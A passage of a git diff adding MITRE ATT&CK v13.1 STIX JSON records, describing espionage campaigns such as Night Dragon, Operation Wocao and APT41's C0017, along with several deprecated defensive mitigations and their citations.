"url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + }, + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--ab747e62-1bcb-479f-a26b-1cd39d413d81.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--ab747e62-1bcb-479f-a26b-1cd39d413d81.json new file mode 100644 index 0000000000000000000000000000000000000000..5bbd3eb9bdfdf09c116eb3d2ceb7d1e399f93ea3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--ab747e62-1bcb-479f-a26b-1cd39d413d81.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--af08a825-4cfe-40fc-8029-80bf88dfa8fa", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-04T20:18:28.362Z", + "name": "C0010", + "description": "[C0010](https://attack.mitre.org/campaigns/C0010) was a cyber espionage campaign conducted by UNC3890 that targeted Israeli shipping, government, aviation, energy, and healthcare organizations. Security researcher assess UNC3890 conducts operations in support of Iranian interests, and noted several limited technical connections to Iran, including PDB strings and Farsi language artifacts. [C0010](https://attack.mitre.org/campaigns/C0010) began by at least late 2020, and was still ongoing as of mid-2022.(Citation: Mandiant UNC3890 Aug 2022)", + "aliases": [ + "C0010" + ], + "first_seen": "2020-12-01T07:00:00.000Z", + "last_seen": "2022-08-01T06:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Mandiant UNC3890 Aug 2022)", + "x_mitre_last_seen_citation": "(Citation: Mandiant UNC3890 Aug 2022)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--ab747e62-1bcb-479f-a26b-1cd39d413d81", + "created": "2022-09-21T22:16:42.003Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0010", + "external_id": "C0010" + }, + { + "source_name": "Mandiant UNC3890 Aug 2022", + "description": "Mandiant Israel Research Team. (2022, August 17). Suspected Iranian Actor Targeting Israeli Shipping, Healthcare, Government and Energy Sectors. Retrieved September 21, 2022.", + "url": "https://www.mandiant.com/resources/blog/suspected-iranian-actor-targeting-israeli-shipping" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--ae407e32-87e0-4d92-8705-3ae25d504d8a.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--ae407e32-87e0-4d92-8705-3ae25d504d8a.json new file mode 100644 index 0000000000000000000000000000000000000000..f5658736064aa99fec5fcefaa1cb3b2a752f48a5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--ae407e32-87e0-4d92-8705-3ae25d504d8a.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--a773939f-cfdf-4e07-bf2c-f15d359fb1fc", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-22T20:45:42.479Z", + "name": "Night Dragon", + "description": "[Night Dragon](https://attack.mitre.org/campaigns/C0002) was a cyber espionage campaign that targeted oil, energy, and petrochemical companies, along with individuals and executives in Kazakhstan, Taiwan, Greece, and the United States. The unidentified threat actors searched for information related to oil and gas field production systems, financials, and collected data from SCADA systems. Based on the observed techniques, tools, and network activities, security researchers assessed the campaign involved a threat group based in China.(Citation: McAfee Night Dragon)", + "aliases": [ + "Night Dragon" + ], + "first_seen": "2009-11-01T04:00:00.000Z", + "last_seen": "2011-02-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: McAfee Night Dragon)", + "x_mitre_last_seen_citation": "(Citation: McAfee Night Dragon)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--ae407e32-87e0-4d92-8705-3ae25d504d8a", + "created": "2022-09-08T13:31:37.391Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0002", + "external_id": "C0002" + }, + { + "source_name": "McAfee Night Dragon", + "description": "McAfee\u00ae Foundstone\u00ae Professional Services and McAfee Labs\u2122. (2011, February 10). Global Energy Cyberattacks: \u201cNight Dragon\u201d. Retrieved February 19, 2018.", + "url": "https://scadahacker.com/library/Documents/Cyber_Events/McAfee%20-%20Night%20Dragon%20-%20Global%20Energy%20Cyberattacks.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--b03d5112-e23a-4ac8-add0-be7502d24eff.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--b03d5112-e23a-4ac8-add0-be7502d24eff.json new file mode 100644 index 0000000000000000000000000000000000000000..69b55fddb8466d9f4bc1a0c46869c3b59e40a16a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--b03d5112-e23a-4ac8-add0-be7502d24eff.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--da056dd8-8d84-4277-bd96-367519553bec", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T05:07:13.071Z", + "name": "Operation Wocao", + "description": "[Operation Wocao](https://attack.mitre.org/campaigns/C0014) was a cyber espionage campaign that targeted organizations around the world, including in Brazil, China, France, Germany, Italy, Mexico, Portugal, Spain, the United Kingdom, and the United States. The suspected China-based actors compromised government organizations and managed service providers, as well as aviation, construction, energy, finance, health care, insurance, offshore engineering, software development, and transportation companies.(Citation: FoxIT Wocao December 2019)\n\nSecurity researchers assessed the [Operation Wocao](https://attack.mitre.org/campaigns/C0014) actors used similar TTPs and tools as APT20, suggesting a possible overlap. [Operation Wocao](https://attack.mitre.org/campaigns/C0014) was named after an observed command line entry by one of the threat actors, possibly out of frustration from losing webshell access.(Citation: FoxIT Wocao December 2019)", + "aliases": [ + "Operation Wocao" + ], + "first_seen": "2017-12-01T05:00:00.000Z", + "last_seen": "2019-12-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: FoxIT Wocao December 2019)", + "x_mitre_last_seen_citation": "(Citation: FoxIT Wocao December 2019)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Erik Schamper, @Schamperr, Fox-IT", + "Maarten van Dantzig, @MaartenVDantzig, Fox-IT" + ], + "type": "campaign", + "id": "campaign--b03d5112-e23a-4ac8-add0-be7502d24eff", + "created": "2022-09-27T14:15:23.984Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0014", + "external_id": "C0014" + }, + { + "source_name": "FoxIT Wocao December 2019", + "description": "Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China\u2019s hidden hacking groups. Retrieved October 8, 2020.", + "url": "https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--b4e5a4a9-f3be-4631-ba8f-da6ebb067fac.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--b4e5a4a9-f3be-4631-ba8f-da6ebb067fac.json new file mode 100644 index 0000000000000000000000000000000000000000..916fdb5e0b70937218e4790e3857ce98cf232187 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--b4e5a4a9-f3be-4631-ba8f-da6ebb067fac.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--84db04ab-026a-448c-ab24-9c906737cd78", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-22T20:26:23.226Z", + "name": "C0011", + "description": "[C0011](https://attack.mitre.org/campaigns/C0011) was a suspected cyber espionage campaign conducted by [Transparent Tribe](https://attack.mitre.org/groups/G0134) that targeted students at universities and colleges in India. Security researchers noted this campaign against students was a significant shift from [Transparent Tribe](https://attack.mitre.org/groups/G0134)'s historic targeting Indian government, military, and think tank personnel, and assessed it was still ongoing as of July 2022.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022) ", + "aliases": [ + "C0011" + ], + "first_seen": "2021-12-01T06:00:00.000Z", + "last_seen": "2022-07-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)", + "x_mitre_last_seen_citation": "(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--b4e5a4a9-f3be-4631-ba8f-da6ebb067fac", + "created": "2022-09-22T17:12:02.893Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0011", + "external_id": "C0011" + }, + { + "source_name": "Cisco Talos Transparent Tribe Education Campaign July 2022", + "description": "N. Baisini. (2022, July 13). Transparent Tribe begins targeting education sector in latest campaign. Retrieved September 22, 2022.", + "url": "https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--ba6dfa37-f401-4140-88b0-8938f2895e61.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--ba6dfa37-f401-4140-88b0-8938f2895e61.json new file mode 100644 index 0000000000000000000000000000000000000000..a40f34afd8f88224ac9921743a26c975f0058fce --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--ba6dfa37-f401-4140-88b0-8938f2895e61.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--53074990-55a9-416b-a18b-34dd52178ba9", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-01-25T21:02:33.515Z", + "name": "C0017", + "description": "[C0017](https://attack.mitre.org/campaigns/C0017) was an [APT41](https://attack.mitre.org/groups/G0096) campaign conducted between May 2021 and February 2022 that successfully compromised at least six U.S. state government networks through the exploitation of vulnerable Internet facing web applications. During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) was quick to adapt and use publicly-disclosed as well as zero-day vulnerabilities for initial access, and in at least two cases re-compromised victims following remediation efforts. The goals of [C0017](https://attack.mitre.org/campaigns/C0017) are unknown, however [APT41](https://attack.mitre.org/groups/G0096) was observed exfiltrating Personal Identifiable Information (PII).(Citation: Mandiant APT41)", + "aliases": [ + "C0017" + ], + "first_seen": "2021-05-01T04:00:00.000Z", + "last_seen": "2022-02-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Mandiant APT41)", + "x_mitre_last_seen_citation": "(Citation: Mandiant APT41)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Kyaw Pyiyt Htet, @KyawPyiytHtet" + ], + "type": "campaign", + "id": "campaign--ba6dfa37-f401-4140-88b0-8938f2895e61", + "created": "2022-12-01T15:40:34.011Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0017", + "external_id": "C0017" + }, + { + "source_name": "Mandiant APT41", + "description": "Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022.", + "url": "https://www.mandiant.com/resources/apt41-us-state-governments" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--f9cc545e-b0ef-4b92-8884-a3a4427609f6.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--f9cc545e-b0ef-4b92-8884-a3a4427609f6.json new file mode 100644 index 0000000000000000000000000000000000000000..74cd898fa1baed2f77a0808ac607e56e0104db4b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--f9cc545e-b0ef-4b92-8884-a3a4427609f6.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--89ed14ac-9026-478b-8eff-24e10eb4a45b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-05T15:54:36.557Z", + "name": "CostaRicto", + "description": "[CostaRicto](https://attack.mitre.org/campaigns/C0004) was a suspected hacker-for-hire cyber espionage campaign that targeted multiple industries worldwide, with a large number being financial institutions. [CostaRicto](https://attack.mitre.org/campaigns/C0004) actors targeted organizations in Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia (especially India, Bangladesh, and Singapore), using custom malware, open source tools, and a complex network of proxies and SSH tunnels.(Citation: BlackBerry CostaRicto November 2020)", + "aliases": [ + "CostaRicto" + ], + "first_seen": "2019-10-01T04:00:00.000Z", + "last_seen": "2020-11-01T04:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: BlackBerry CostaRicto November 2020)", + "x_mitre_last_seen_citation": "(Citation: BlackBerry CostaRicto November 2020)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--f9cc545e-b0ef-4b92-8884-a3a4427609f6", + "created": "2022-09-15T17:25:38.020Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0004", + "external_id": "C0004" + }, + { + "source_name": "BlackBerry CostaRicto November 2020", + "description": "The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021.", + "url": "https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--00d7d21b-69d6-4797-88a2-c86f3fc97651.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--00d7d21b-69d6-4797-88a2-c86f3fc97651.json new file mode 100644 index 0000000000000000000000000000000000000000..365581d358a3f51359f4f022182c1890351b944c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--00d7d21b-69d6-4797-88a2-c86f3fc97651.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--cce4dfbb-8c9f-450e-9f7d-e4711d89cfa1", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--00d7d21b-69d6-4797-88a2-c86f3fc97651", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1174", + "external_id": "T1174" + }, + { + "url": "https://msdn.microsoft.com/library/windows/desktop/ms721766.aspx", + "description": "Microsoft. (n.d.). Installing and Registering a Password Filter DLL. Retrieved November 21, 2017.", + "source_name": "Microsoft Install Password Filter n.d" + } + ], + "modified": "2019-07-25T11:22:19.139Z", + "name": "Password Filter DLL Mitigation", + "description": "Ensure only valid password filters are registered. Filter DLLs must be present in Windows installation directory (C:\\Windows\\System32\\ by default) of a domain controller and/or local computer with a corresponding entry in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages. (Citation: Microsoft Install Password Filter n.d)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--02f0f92a-0a51-4c94-9bda-6437b9a93f22.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--02f0f92a-0a51-4c94-9bda-6437b9a93f22.json new file mode 100644 index 0000000000000000000000000000000000000000..20a9678489b4d67e6b344b2f71c8d93d5b2c9689 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--02f0f92a-0a51-4c94-9bda-6437b9a93f22.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--1fb044c9-55d5-484b-a3d9-95ba48163d94", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--02f0f92a-0a51-4c94-9bda-6437b9a93f22", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1151", + "external_id": "T1151" + } + ], + "modified": "2019-07-25T11:46:32.010Z", + "name": "Space after Filename Mitigation", + "description": "Prevent files from having a trailing space after the extension.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--03c0c586-50ed-45a7-95f4-f496d7eb5330.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--03c0c586-50ed-45a7-95f4-f496d7eb5330.json new file mode 100644 index 0000000000000000000000000000000000000000..c5e1855f6b73699ab28f91845e3b02ef12fa9b26 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--03c0c586-50ed-45a7-95f4-f496d7eb5330.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--9fbdc803-3069-43b5-9cdf-47c146864486", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--03c0c586-50ed-45a7-95f4-f496d7eb5330", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1148", + "external_id": "T1148" + }, + { + "url": "http://www.akyl.net/securing-bashhistory-file-make-sure-your-linux-system-users-won%E2%80%99t-hide-or-delete-their-bashhistory", + "description": "Mathew Branwell. (2012, March 21). Securing .bash_history file. Retrieved July 8, 2017.", + "source_name": "Securing bash history" + } + ], + "modified": "2019-07-24T19:34:34.065Z", + "name": "HISTCONTROL Mitigation", + "description": "Prevent users from changing the HISTCONTROL environment variable (Citation: Securing bash history). Also, make sure that the HISTCONTROL environment variable is set to \u201cignoredup\u201d instead of \u201cignoreboth\u201d or \u201cignorespace\u201d.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--0472af99-f25c-4abe-9fce-010fa3450e72.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--0472af99-f25c-4abe-9fce-010fa3450e72.json new file mode 100644 index 0000000000000000000000000000000000000000..b3b6fb02ca7abfb62613cc316739cf9c0e3fe295 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--0472af99-f25c-4abe-9fce-010fa3450e72.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--470544ee-687d-477d-812b-e81a7a694bc5", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--0472af99-f25c-4abe-9fce-010fa3450e72", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1081", + "external_id": "T1081" + }, + { + "source_name": "Microsoft MS14-025", + "description": "Microsoft. (2014, May 13). MS14-025: Vulnerability in Group Policy Preferences could allow elevation of privilege. Retrieved January 28, 2015.", + "url": "http://support.microsoft.com/kb/2962486" + } + ], + "modified": "2019-07-24T18:12:19.081Z", + "name": "Credentials in Files Mitigation", + "description": "Establish an organizational policy that prohibits password storage in files. Ensure that developers and system administrators are aware of the risk associated with having plaintext passwords in software configuration files that may be left on endpoint systems or servers. Preemptively search for files containing passwords and remove when found. Restrict file shares to specific directories with access only to necessary users. Remove vulnerable Group Policy Preferences. (Citation: Microsoft MS14-025)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--06160d81-62be-46e5-aa37-4b9c645ffa31.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--06160d81-62be-46e5-aa37-4b9c645ffa31.json new file mode 100644 index 0000000000000000000000000000000000000000..f3999035b3aab9dbec81eac2e1324261a98a18dc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--06160d81-62be-46e5-aa37-4b9c645ffa31.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--eeb60fc1-4121-42ec-b150-de773cc6cc86", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--06160d81-62be-46e5-aa37-4b9c645ffa31", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1212", + "external_id": "T1212" + }, + { + "url": "https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/", + "description": "Goodin, D. (2017, March 17). Virtual machine escape fetches $105,000 at Pwn2Own hacking contest - updated. Retrieved March 12, 2018.", + "source_name": "Ars Technica Pwn2Own 2017 VM Escape" + }, + { + "url": "https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/", + "description": "Nunez, N. (2017, August 9). Moving Beyond EMET II \u2013 Windows Defender Exploit Guard. Retrieved March 12, 2018.", + "source_name": "TechNet Moving Beyond EMET" + }, + { + "url": "https://en.wikipedia.org/wiki/Control-flow_integrity", + "description": "Wikipedia. (2018, January 11). Control-flow integrity. Retrieved March 12, 2018.", + "source_name": "Wikipedia Control Flow Integrity" + } + ], + "modified": "2019-07-24T19:23:33.259Z", + "name": "Exploitation for Credential Access Mitigation", + "description": "Update software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)\n\nSecurity applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for software targeted for defense evasion.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--0640214c-95af-4c04-a574-2a1ba6dda00b.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--0640214c-95af-4c04-a574-2a1ba6dda00b.json new file mode 100644 index 0000000000000000000000000000000000000000..1857e0e1fcd54d791059369ba4dcde15c25f223e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--0640214c-95af-4c04-a574-2a1ba6dda00b.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--734adc9d-acc5-4c2e-98ac-3142c65bd832", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--0640214c-95af-4c04-a574-2a1ba6dda00b", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1012", + "url": "https://attack.mitre.org/mitigations/T1012", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:24.641Z", + "name": "Query Registry Mitigation", + "description": "Identify unnecessary system utilities or potentially malicious software that may be used to acquire information within the Registry, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": 